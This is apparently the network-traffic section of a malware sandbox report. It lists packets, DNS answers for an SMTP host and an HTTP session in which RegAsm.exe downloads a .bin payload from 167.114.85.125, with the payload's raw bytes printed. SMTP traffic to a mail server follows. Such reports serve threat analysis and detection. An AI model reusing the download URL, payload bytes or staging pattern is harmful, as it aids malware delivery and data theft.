Apr 22, 2020 21:58:16.507976055 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507977962 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508094072 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508097887 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508213043 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508328915 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508408070 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508445978 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508533955 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508569002 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508635998 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508682013 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508718014 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508812904 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508884907 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.508924007 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.508974075 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509035110 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509044886 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509166956 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509247065 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509284019 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509337902 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509403944 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509423018 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509526968 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509531021 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509644032 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509654045 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509771109 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.509805918 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.509947062 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.604552984 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.604571104 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.604686975 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.604733944 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.604744911 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.604768991 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.604887962 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.604980946 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.604998112 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605196953 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.605251074 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605268955 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605381012 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605439901 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.605459929 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605519056 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.605576992 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605598927 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.605699062 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605771065 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.605846882 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.605859041 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606039047 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606054068 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606061935 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606205940 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606225014 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606323004 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606411934 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606432915 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606527090 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606558084 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606585026 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606653929 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606686115 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606777906 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.606781960 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606884003 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.606911898 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607002020 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607011080 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607139111 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607165098 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607254028 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607316971 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607355118 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607408047 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607490063 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607498884 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607626915 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607640028 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607729912 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607811928 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607830048 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607903957 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.607954025 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.607992887 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608069897 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608072996 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608190060 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608256102 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608304977 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608340025 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608426094 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608428955 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608549118 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608556986 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608665943 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608736038 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608819008 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.608829021 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608916998 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.608992100 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609016895 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609081984 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609132051 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609164953 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609261990 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609324932 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609376907 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609406948 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609493971 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609498978 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609617949 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609678984 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609728098 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609776020 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609858036 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609862089 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.609976053 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.609976053 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610093117 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610095978 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610213041 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610217094 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610330105 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610335112 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610446930 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610451937 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610569000 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610569000 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610686064 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610690117 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610805988 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610807896 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.610924006 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.610925913 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611042976 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611044884 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611161947 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611165047 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611283064 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611283064 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611402035 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611411095 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611522913 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611586094 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611638069 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611677885 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611761093 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.611807108 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611903906 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.611995935 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612015963 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612116098 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612236023 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612273932 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612353086 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612385988 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612473965 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612477064 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612595081 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612658978 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612709999 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612735987 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612831116 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612905979 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.612942934 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.612977028 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613065958 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613078117 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613192081 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613241911 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613295078 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613342047 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613426924 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613432884 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613548994 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613555908 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613666058 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613733053 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613785028 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613821030 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.613900900 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.613907099 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614012957 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614023924 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614139080 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614206076 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614257097 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614279032 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614377975 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614451885 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614490986 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614525080 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614614964 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.614623070 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614639997 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.614774942 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:21.546791077 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:21.546901941 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:47.761327028 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:47.903593063 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:47.904134035 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:48.551398993 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:48.552267075 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:48.694659948 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:48.694683075 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:48.695025921 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:48.837642908 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:48.893582106 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.062138081 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.205146074 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.205178976 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.205197096 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.205212116 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.205229044 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.205317974 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.252918005 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.347939014 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.367754936 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.514146090 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.566114902 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.571497917 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.713892937 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.722738028 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:49.866230011 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:49.867578983 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.012317896 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.013585091 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.157202005 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.158406019 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.331295967 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.332004070 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.475039005 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.490371943 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.490700006 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.490895033 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.491103888 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 21:58:50.632977962 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.633002043 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.730345011 CEST	587	49771	208.91.199.223	192.168.0.80
Apr 22, 2020 21:58:50.783814907 CEST	49771	587	192.168.0.80	208.91.199.223
Apr 22, 2020 22:00:05.907879114 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 22:00:06.265427113 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 22:00:06.874631882 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 22:00:08.077517986 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 22:00:10.483167887 CEST	49768	80	192.168.0.80	167.114.85.125

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 22, 2020 21:58:10.427838087 CEST	61715	53	192.168.0.80	1.1.1.1
Apr 22, 2020 21:58:10.436350107 CEST	53	61715	1.1.1.1	192.168.0.80
Apr 22, 2020 21:58:26.700720072 CEST	65110	53	192.168.0.80	1.1.1.1
Apr 22, 2020 21:58:26.709319115 CEST	53	65110	1.1.1.1	192.168.0.80
Apr 22, 2020 21:58:32.610244036 CEST	64961	53	192.168.0.80	1.1.1.1
Apr 22, 2020 21:58:32.618798018 CEST	53	64961	1.1.1.1	192.168.0.80
Apr 22, 2020 21:58:47.732878923 CEST	64185	53	192.168.0.80	1.1.1.1
Apr 22, 2020 21:58:47.741924047 CEST	53	64185	1.1.1.1	192.168.0.80

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 22, 2020 21:58:47.732878923 CEST	192.168.0.80	1.1.1.1	0x8622	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 22, 2020 21:58:47.741924047 CEST	1.1.1.1	192.168.0.80	0x8622	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Apr 22, 2020 21:58:47.741924047 CEST	1.1.1.1	192.168.0.80	0x8622	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Apr 22, 2020 21:58:47.741924047 CEST	1.1.1.1	192.168.0.80	0x8622	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Apr 22, 2020 21:58:47.741924047 CEST	1.1.1.1	192.168.0.80	0x8622	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

167.114.85.125

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.0.80	49768	167.114.85.125	80	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Apr 22, 2020 21:58:16.092093945 CEST	4947	OUT	GET /go/Jay_uncrypt_rZmowgNiLH235.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 167.114.85.125 Cache-Control: no-cache
Apr 22, 2020 21:58:16.194374084 CEST	4948	IN	HTTP/1.1 200 OK Date: Wed, 22 Apr 2020 19:58:04 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Wed, 22 Apr 2020 00:23:37 GMT ETag: "48e40-5a3d624a9f440" Accept-Ranges: bytes Content-Length: 298560 Content-Type: application/octet-stream Data Raw: 3a 5f d7 00 38 f3 58 dd 94 87 5a 34 25 5e a3 bf 22 2b d7 73 99 8c 8d c4 2d 03 ad ca 6f 6f f7 b9 62 5a 22 c0 26 92 e9 71 73 ea 77 92 57 a1 db 74 4f 71 a0 34 6d 9c 37 5b ab 80 62 43 ef 67 ac 3d 02 32 4a 1c 3c d5 14 11 64 72 80 57 2d e2 f8 aa e9 5c c1 4e 64 a9 98 43 c5 02 03 89 b3 f1 7b dc 76 ec 45 c4 46 7d 5f b9 66 d7 86 bb d8 c5 ff 52 9b c1 c8 f6 6b 51 e2 eb 8c ab 0a 31 7e 99 82 85 72 8a f1 63 90 56 6c af 90 c7 8c 28 12 4f 51 93 cb 1a ee ef 03 d9 8e e6 f3 3e 74 b9 65 2c a2 42 b3 1d f4 b4 b7 f8 19 a8 97 41 b9 2c 6d 59 03 83 c5 7d 7d 22 92 53 e2 36 f9 fc 5a 82 4f ea d3 d6 9d a3 9c 7a d1 32 b5 6f 00 97 46 eb 30 bf 56 08 f3 ba 1f f0 22 07 38 e4 e8 a5 69 e7 55 15 dd 7e d4 88 a3 22 e8 db bd 17 26 dd e0 5d 7a 47 a1 b0 f9 a3 6e 98 c9 af 00 8d ea 6d ab 8f 5c f5 24 27 1a 37 ed cb ee 84 c3 c0 0b 21 2f 06 81 cc a7 59 00 0b 75 fd 13 5a 8b f2 34 f5 b2 38 a4 a0 6a 4a 25 df e4 73 f5 3c 0e 68 59 ca 25 ae 87 64 ae 01 4a b4 77 a5 0a 00 91 9a 3b 9e b9 e0 ad 48 75 78 8f 2b fe 1c 74 d5 14 11 60 b2 84 57 32 1f f8 aa 51 5c c1 4e 64 a9 98 43 85 02 03 89 b3 f1 7b dc 76 0c 41 c4 4a 7d 5f b9 66 d7 86 bb d8 c5 ff 52 9b c1 c8 f6 6b 51 e2 eb 8c ab 0a 31 fe 99 82 85 7c 95 4b 6d 90 e2 65 62 b1 7f 8d 64 df 6e 05 fb a2 69 ce 9f 71 b6 e9 94 92 73 54 da 0c 42 cc 2d c7 3d 96 d1 97 8a 6c c6 bf 08 d7 0c 61 16 50 a3 a8 12 19 47 bc 5e ef 3c f3 88 3f fa 3b ea d3 d6 f9 62 98 7a 9d 13 b6 6f be 56 da b5 30 bd 56 08 f3 ba 1f f0 c2 07 3a e5 e3 a4 61 e7 75 93 d9 1e fa fc d0 50 8b db bd 17 e8 7b e4 5d 7a a7 a5 b0 f9 67 6a 98 c9 27 44 8d ea 4d ab 8f 5c f7 24 27 1e 37 ed cb ae 84 c3 80 21 53 4a 6a ee af a7 59 0c 0b 70 fd 13 b8 8f f2 34 f7 b2 38 a6 2c 2e cf 25 df f4 73 f5 2c 0e 68 59 ca 35 ae c7 74 ae 43 4a b4 77 a5 1a 00 91 9a 3b 9e b9 e0 ad 48 75 78 7f 2c fe 1c 3f d5 14 11 28 72 80 57 d0 1d fd aa 69 91 c2 4e cc 7f 98 43 86 02 03 89 fb f1 7b da 76 ec 45 c4 46 7d 5f b9 66 d7 86 bb d8 c5 4f 68 da 1c 3f d5 14 11 60 72 80 57 d2 1d f8 aa 51 5c c1 4e 64 a9 98 43 85 02 03 89 b3 f1 7b dc 76 ec 87 e4 41 c2 48 94 3b 89 29 47 08 11 19 17 08 e8 e4 6f 92 e3 f8 69 14 be 89 9e b0 c4 fa 09 b0 dc b3 92 89 a3 9c 60 a8 7d 42 b1 cd 91 bd ff c4 26 1f 3f 98 7e ce eb eb d1 6a 74 78 27 f5 c5 fc 47 14 23 76 39 fd 8b 62 bd 00 2c 75 27 fb 1b fc e2 c4 4a 79 fe fb d5 b7 b6 df 64 39 60 da 94 00 da 32 81 06 cf 19 fb 58 b6 b5 72 1e fb a1 c3 7d 66 65 b0 a3 58 70 a2 29 c1 00 dd 75 23 a2 9f 5c 1c 55 1a f9 b8 1e 7f 7b 75 6c 95 29 3e e2 e1 2f bb 4f e6 33 c6 3f 86 7a 91 95 34 75 2c f1 00 f0 28 b3 4d f3 da 38 fe 84 b4 76 fb cb 6d 86 c2 28 c5 a7 b6 e2 ac 2e 2d 3f ae e7 c0 22 6e 2d b4 6b bf ec 81 5d fb 44 3a e2 d6 ab 44 df b4 96 71 1e e7 ed 7b 0c 9e 44 16 99 37 18 4b cf 49 98 a9 c7 bb 68 ec e5 ff 1b 90 39 97 fe 13 9e cc 98 ce 76 d2 4c cc 4f b8 ad b2 a2 59 2f 97 fa 1b 22 55 1f 70 41 be 4f dc fc 71 b6 7e f0 16 70 f2 ea ce f8 5d e9 f2 e8 5f 52 59 f9 84 95 b8 53 d4 61 69 83 ae 20 af f9 2b 7d 9e b6 5a 6a a5 89 32 80 db 